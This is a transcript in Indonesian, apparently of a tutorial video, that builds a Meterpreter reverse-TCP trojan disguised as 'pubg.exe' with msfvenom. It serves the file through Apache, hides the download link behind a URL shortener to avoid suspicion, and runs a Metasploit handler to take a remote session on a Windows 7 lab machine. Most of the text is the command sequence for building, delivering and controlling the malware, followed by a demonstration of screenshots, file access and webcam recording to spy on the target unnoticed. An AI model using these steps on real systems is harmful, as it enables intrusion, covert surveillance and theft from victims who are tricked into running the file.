Halo, jumpa lagi bersama Learning by Doing. Ini adalah video terakhir dari chapter atau pembelajaran malware ya. Nah, di video kali ini kita akan coba mensimulasikan caranya atau bagaimana cara membuat sebuah malware itu. Lalu nanti ke depannya atau setelah kita membuat malware, kita akan mendistribusikan ke malware ini ke sistem operasi Windows seperti itu. Nah, sebelum kita praktek atau simulasi, ada tahapan-tahapan untuk pembuatan simulasi pembuat sebuah malware-nya. Nah, yang pertama, kita akan menggunakan sebuah Kali Linux ya. Jadi kita akan menggunakan Kali Linux untuk malware pembuat malware-nya. Lalu yang kedua kita akan menggunakan tools yang namanya MSF Venom, di mana dia adalah tools untuk membuat sebuah malware tanpa harus ngoding seperti itu ya, karena memang ini adalah pembelajaran dan bagi pemula. Lalu kita juga nanti akan menggunakan tools Metasploit, di mana Metasploit ini fungsinya untuk memonitoring si malware ini ketika memang sudah terinfeksi ke dalam sebuah sistem operasi Windows seperti itu. Lalu yang ketiga, kita butuh virtual mesin Windows-nya untuk nanti target, karena saya nggak mungkin mendistribusikan malware ini ke target secara ilegal gitu. Jadi saya akan menambahkan satu buah virtual mesin Windows. Lalu yang keempat adalah shortener link. Nah, shortener link ini adalah untuk untuk mengganti link atau URL supaya tidak terlalu mencurigakan seperti itu. Jadi ketika memang ada link link yang masuk ke si target, lalu target itu ngeklik, maka otomatis akan mendownload si malware-nya berupa file executable atau .exe. Lalu selanjutnya, nah ini adalah skema serangannya ya. Jadi sebenarnya simpel aja seperti ini. Jadi kita sebagai pembuat malware itu akan membuat sebuah malware yang ini akan membuat sebuah malware dengan menggunakan MSF Venom ya, tools MSF Venom yang ada di Kali Linux. Nah, setelah itu ketika kita sudah berhasil membuat sebuah malware, kita akan coba mendistribusikan ke sistem operasi Windows. Nah, nanti di Windows ini kita akan coba install malware ini, lalu nanti ketika memang Windows ini sudah terinstall malware, dia akan dimonitoring oleh Metasploit. Nah, jadi Metasploit ini adalah tools dari Kali Linux, di mana salah satunya untuk memonitoring si malware. Supaya apa? Supaya nanti kita akan mendapatkan reporting dari si Metasploit-nya. Mulai dari misalkan kita ingin melakukan aktivitas-aktivitas di si Windows ini ya. Nah, jadi intinya kita sebagai penyerang itu akan menyerang target kita ke Windows supaya kita bisa mengakses si Windows ini secara full. Nah, jadi itu adalah mekanisme dari serangan malware-nya. Oke, langsung aja kita buat simulasinya. Pastikan teman-teman di sini sudah mempunyai virtual mesin Kali Linux dan sistem operasi Windows. Sebenarnya Windowsnya boleh Windows 7, Windows 8, 10 ataupun 11 ya, bebas. Di sini saya menggunakan Windows 7. Lalu selanjutnya sebelum kita start, pastikan teman-teman di targetnya di sini itu sudah sesuai jaringannya ya. Di sini networknya itu bridge adapter supaya satu jaringan dengan si Kali Linux-nya seperti itu. Oke, selanjutnya ini kita run aja. Oke, tunggu sebentar.
Oke ya, Kali Linuxnya udah terbuka, lalu kita buka juga yang ini. Oke, kita tunggu dulu. Oke, ini udah berhasil ya. Jadi di sini kita mempunyai dua virtual machine yang aktif. Yang pertama Kali Linux dan yang kedua adalah Windows 7 sebagai target kita. Nah, sekarang kita masuk ke Kali Linux dulu. Oke, ini kita cek dulu deh. Ini kita akan cek IP-nya, IP config. Oke ya, di sini 192.168.1.10. Nah, sekarang kita cek yang di sini, yang di Kali Linux. Kita cek. If config. Oke, di sini kita mendapatkan satu segmen ya. 192.168.1.9. Nah, sekarang kita akan buat si malware-nya. Nah, caranya kita akan menggunakan tools yang namanya MSF Venom ya. Kita di sini tulis aja MSF Venom seperti ini. MSF Venom. Lalu minp. Nah, minp ini untuk target yang akan kita serang, yaitu adalah Windows, sistem operasi Windows /meter/reverse TCP. Nah, teman-teman, kalau misalkan kebetulan di sini saya menggunakan Windows 7 yang 32 bit ya. Tapi kalau misalkan teman-teman menggunakan Windows yang 64 bit, teman-teman tinggal ganti aja atau tinggal tambahkan di sini x64 seperti ini /. Nah, kalau misalkan 32 ini nggak usah, jadi kita tinggal hapus. Selanjutnya kita tambahkan lhost. Nah, lhost ini untuk nantinya memonitoring si malware ketika memang sudah masuk ke si targetnya. Nah, untuk lhost-nya ini kita menggunakan IP dari Kali Linux kita, yaitu 1.9, 192.168.1.9. Lalu port yang akan kita pakai lport. Nah, kalau port itu bebas ya, dari 1 sampai dengan 32.000. Misalkan di sini saya menggunakan port 100.001 seperti ini. Sorry, di sini sama dengan 100.001. Ini pun sama ya, lhost sama dengan 100.001. 192.168.1.9. Selanjutnya format yang akan kita pakai yaitu exe, dan outputnya atau hasil dari malware kita akan dinamain apa gitu. Di sini saya coba menamakan apa ya, misalkan PUBG deh, PUBG seperti ini.
.exe. Oke, kalau udah tinggal di enter. Oke, ini udah berhasil. Nah, sekarang kita akan cek ya menggunakan ls. Oke, di sini sudah ada satu buah program executable dengan nama pubg.exe. Nah, selanjutnya di sini kita akan pindahkan ke dalam Apache kita gitu. Karena nanti kita akan menggunakan link atau membuka di web seperti itu. Nah, caranya kita tambahkan di sini sudo lalu cp ini untuk mengcopy si file executable ini ke dalam var ww kita. Cp lalu nama dari file kita adalah pubg, misalkan pubg.exe, lalu di sini /var /www/html. Oke, udah. Kalau sudah, kita cek ya apakah sudah tercopy ke dalam var ww kita. Kita cukup ls lalu di sini var www.html. Oke, di sini ada ya satu buah file dengan nama pubg.exe. Nah, selanjutnya ini kita clear dulu biar nggak banyak. Kita akan nge-start si Apache-nya supaya si malware kita bisa didistribusikan ke target kita. Caranya kita start dulu Apache-nya. Sudo service Apache 2 start ini. Oke, kita enter. Nah, kalau misalkan kita pengen ngecek apakah Apache kita sudah jalan atau belum, itu caranya kita sudo service lalu Apache 2 status. Oke, ini udah aktif ya. Ini ada tulisan aktif atau running. Nah, selanjutnya itu kita akan masuk ke Metasploit-nya. Oke, ini biarkan aja. Kita buat lagi satu buah Metasploit. Sorry. Sini ada Metasploit. Oke, ada. Kita tinggal buka aja. Tunggu dulu. Oke, ini udah berhasil membuka Metasploit. Nah, ini posisi Metasploit-nya sudah berhasil dibuka. Sebelum kita melanjutkan ke Metasploit-nya, kita cek dulu ya, apakah file yang kita sudah upload di Apache itu bisa diakses atau enggak. Caranya di sini kita cukup masuk ke link kita, yaitu http 192.168.1.9. Oke, ini udah
masuk ya ke Debian-nya. Nah, ini kita sudah masuk. Nah, kalau misalkan pengen ngecek, kita kasih slash lalu pubg.exe, enter. Nah, ini udah ada ya. Jadi ini kalau misalkan dijalankan, ini adalah file malware seperti itu. Oke, nah ini kan kalau misalkan kita mendistribusikan link ini, pasti kan akan curiga lah gitu si targetnya. Maka kita butuh yang namanya shortener link. Nah, misalkan di sini saya menggunakan Katli. Oke, di sini saya harus login dulu ya. Saya login dulu. Bentar, saya login dulu. Ini saya skip. Oke, di sini saya sudah registrasi dan sudah berhasil masuk ke katli.ly. Nah, di sini kita tinggal tuliskan link yang mengarah ke Apache kita ya, yaitu http 192.168.1.9/pubg.exe. Oke, kita shorten. Oke, ini udah berhasil, tinggal kita copy. Selanjutnya kita pergi lagi ke sini, ke MSF 6. Jadi teman-teman tinggal buka aja di sini, tulis Metasploit. Nanti kalau sudah di enter masuk ke tampilan seperti ini. Nah, selanjutnya kita akan mengeksploit si malware ini supaya bisa didistribusikan seperti itu. Nah, caranya gimana? Kita akan menggunakan perintah use lalu exploit seperti ini /multi handler seperti ini. Kalau udah di enter, nah jadi si malwarenya nanti akan membuat sebuah payload di mana si payload ini payload cell reverse TCP ini akan didistribusikan ke targetnya seperti itu. Selanjutnya kita setting dulu ya. Kita setting dulu payloadnya di sini, set seperti ini payload. Nah, payload ini akan diarahkan kemana? Ke target kita, yaitu Windows /meter/reverse_tcp. Kita enter. Oke, berhasil. Payloadnya sudah kita setting. Lalu selanjutnya kita akan set lhost-nya ya, untuk nantinya bisa kita monitoring. Berarti set lhost seperti ini ke alamat IP kita, ke alamat IP Kali Linux-nya, yaitu 192.168.1. Berapa tadi ya? Saya lupa. 9 ya. 9, enter. Lalu L-port-nya juga jangan lupa kita set L-port yaitu 1001. Nah, kalau udah tinggal kita run. Nah, ini started reverse TCP handler on ini.
Ini alamat IP kita dan port yang kita gunakan 1001. Nah, sekarang kita buka yang ini, yang target kita, yaitu Windows 7. Kita masuk ke Firefox. Nah, misalkan nanti kan seolah-olah misalkan masuk atau dikirim ke menggunakan WhatsApp atau apa gitu ya. Nah, jadi di sini saya tinggal copy aja, lalu saya pastekan di yang ini. Bisa nggak ya kira-kira pastenya? Oh, nggak bisa ya. Berarti kita harus paste di luar dulu deh. Kita buka Notepad. Buka Notepad, lalu kita paste di sini. Selanjutnya ini kita copy, lalu kita paste di sini. Oh, bisa juga. Berarti kita tulis aja deh. HTTPS lalu cut.ly /TEYK GK SF. Enter. Nah, otomatis dia akan mendownload sebuah file malware yang sudah kita buat di Kali Linux. Ini kita klik simpan aja berkas. Oke, udah ke download. Lalu kita buka. Lalu kita install aja. Klik 2 kali atau double klik run. Nah, ini sebenarnya nggak munculin apa-apa gitu. Nah, langsung hilang. Tetapi kalau kita cek di sini di Kali Linux kita, nah di sini ada nih sending stage target kita yaitu 1.10 dan nih Meterpreter session 1 open. Nah, kalau udah kayak gini ya enak, tinggal kita bongkar-bongkar aja seperti itu. Kalau udah, kita bisa cek dulu ya si ID dari target kita menggunakan get UID. Enter. Nah, di sini kita mendapatkan username-nya adalah yang ini. Sama persis dengan yang ada di sini ya. Oke. Ini adalah hostname-nya. Sama ya. Pas. Nah, selanjutnya setelah ini kita bisa ngapain aja. Sebenarnya kita tinggal cek aja ya, cek isi dari apa ya, isi dari si target kita. Nah, selanjutnya kita akan coba untuk kita bisa ngapain aja sih di Metasploit ini. Caranya kita ketik aja di sini help, lalu enter, help, enter. Nah, sini ada banyak ya, nih. Misalkan yang pertama ini ada komen ya. Misalkan kita ingin mengambil background, lalu BG kill, BG list, lalu di sini ada banyak lah, misalkan kita bisa nge-sleep si laptop target atau device target, lalu banyak di sini. Nah, di sini file system command kita bisa cat ya. Cat ini untuk membaca atau membuka sebuah file, lalu kita bisa cd atau change directory. Kita bisa berpindah directory yang dari C ke D seperti itu. Lalu di sini ada untuk
copy file ataupun file gambar, terus dan lain sebagainya. Lalu di sini ada delete, lalu kita bisa ngedownload juga. Banyak nih, kita bisa ngecek ya print word directory kita yang sedang berjalan di mana. Lalu kita bisa ngedelete file yang spesifik seperti itu. Nih, rm. Nah, ini ada networking, kita bisa ngecek konfigurasi dari IP address, si target, route-nya, dan yang lain-lain. Di sini ada sistem juga, sistem komen. Ini tinggal kita jalanin aja nih perintahnya. Udah apa ya? Udah enak seperti itu. Nih. Nah, ini webcam comment kita bisa nge-record nge-record si target, kita bisa membuka webcam chat. Nah, ini start a video chat ya. Kita bisa ngecek web listnya apa aja, terus kita bisa webcam snap dan webcam stream. Ini udah, kalau misalkan malware ini udah terinfeksi, ya kita bisa enak tuh. Jadi masih banyak lagi lah. Nah, ini screenshot. Nah, misalkan kita akan screenshot deh. Kita cek dulu ya di sini. Misalkan saya buka ini, misalkan ke picture. Nah, ini nih tampilannya seperti ini. Coba kita tulis di sini screenshot. Mana screenshot tuh? Screenshot. Enter. Nah, screenshot save to home lalu ke ini. Kita cek ya di sini, kita buka directory kita, open folder, lalu dikali, kita cek di bawah. Nah, ini ada nih. Kita buka. Nah, sesuai ya dengan yang ada di sini. Jadi kita bisa mata-matain target kita melalui melalui si malware. Selanjutnya misalkan kita ingin nge-sleep. Nah, tadi kan ada nih sleep. Berarti kita tinggal tulis aja sleep. Sleep, enter. Nah, ini to wait. Coba kita cek di sini. Ini butuh waktu ya untuk nge-sleep. Oh, sleep time. Berarti kita harus menambahkan waktu seperti itu. Coba kita copy yang ada di sini, ada file nggak di sini. Nah, misalkan kita copy yang mana ya? Ini deh. Nah, ini kita mau copy yang folder pictures. Kita tinggal tulis aja di sini copy. Oh, copy itu cp kalau nggak salah tadi ya, di atas. Cp, mana cp? Nah, ini nih. Copy. Kita bisa download. Nah, jadi teman-teman silahkan dicoba aja. Jika teman-teman misalkan pengen belajar lebih jauh lagi menggunakan Metasploit, jadi teman-teman tinggal tuliskan aja help seperti itu, nanti otomatis akan dikasih tahu cara-caranya sesuai dengan yang teman-teman inginkan. Nah, di sini juga ada deskripsinya. Jadi teman-teman tinggal dibaca aja. Kalau misalkan ingin menghapus, copy data dan lain sebagainya. Nah, intinya kalau misalkan target ini sudah terinfeksi malware kita, ini kita tinggal bebas mau ngapain aja gitu. Dan si target pun tidak akan tahu bahwa kita itu sedang memata-matai si targetnya seperti itu.
Nah, jadi itu aja teman-teman untuk tutorial simulasi pembuatan malware, lalu pendistribusian malware, dan monitoring malware itu sehingga kita sebagai penyerang atau red team itu bisa mengakses si targetnya, dalam hal ini adalah Windows 7 seperti itu. Kita akan berjumpa lagi di sesi atau chapter berikutnya yang lebih seru lagi tentunya. Stay tune terus di channel Learning by Doing. Sampai jumpa dan thank you.